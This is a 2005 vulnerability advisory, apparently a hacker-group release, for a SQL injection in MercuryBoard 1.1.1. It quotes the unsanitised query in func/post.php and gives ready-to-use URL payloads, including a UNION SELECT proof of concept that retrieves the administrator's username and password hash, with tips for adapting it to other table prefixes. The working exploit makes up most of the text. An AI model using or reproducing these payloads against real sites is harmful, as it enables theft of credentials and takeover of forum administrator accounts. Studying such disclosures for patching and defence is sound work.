{==============================================================================}
{                           [   Zeelock-2005   ]                               }
{==============================================================================}
{                                                                              }
{                          M E C U R Y  B O A R D                              }
{                                                                              }
{             [   Critical SQL Injection - Working Exploit  ]                  }
{                                                                              }
{                                                                              }
{==============================================================================}

Date: 7th February 2005
Version Vulnerable: <= 1.1.1
Version Fixed: 1.1.2

"Validate anything can be passed. Security lays in the inputs. " - zk


Description
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MercuryBoard is a powerful message board system dedicated to raw speed with a 
mixture of features, ease of use, and ease of customization coupled with 
expandability, and diverse language services. Now just over two years in the 
making, version 1.0.0 is an immensely stable, thoroughly tested, and well
written piece of internet software ready for any webserver, running on PHP 
versions as low as 4.0.0 and MySQL versions as low as 3.22.

For More information:

http://www.mercuryboard.com/index.php?a=about



Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Andrea Trivero of Codebug Security (www.codebug.org) found a lot of security 
flaws inside this code: many XSS and some Sql injection.
Anyway he did not provide a real working exploit.

Looking at the following piece of code in func/post.php we can see that when the
"qu" variable is passed along with the "reply" switch we can inject anything
inside the "t" parameter passed via GET from the browser because it is not 
sanitized at all.


--------[ Mercury 1.1.1 original code ]-------------- 

if (($s == 'reply') && isset($this->get['qu'])) { 

$query = $this->db->fetch("SELECT p.post_text, m.user_name FROM { 

$this->pre}posts p, {$this->pre}users m WHERE p.post_id={ 

$this->get['qu']} AND p.post_author=m.user_id"); 

--------[/Mercury 1.1.1 original code ]--------------


Now we can try to inject something:

http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION
%20SELECT%20null,null/*

The only thing we have to keep in mind is that "t" parameter should refer to a 
"opic we have the permission to reply and the "qu" parameter should refer
to a non existing topic.

We get no errors so we can make something more.

Proof of concept
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION
%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20
=%201%20limit%201/*

The nice thing is that you should see the Admin Username and the Admin Pwd Hash
inside the reply form between the [quote] tags.

Note: During the installation you may have chosen a different prefix for the 
tables. You need to modify the query in the right way to retrieve the 
information from the database.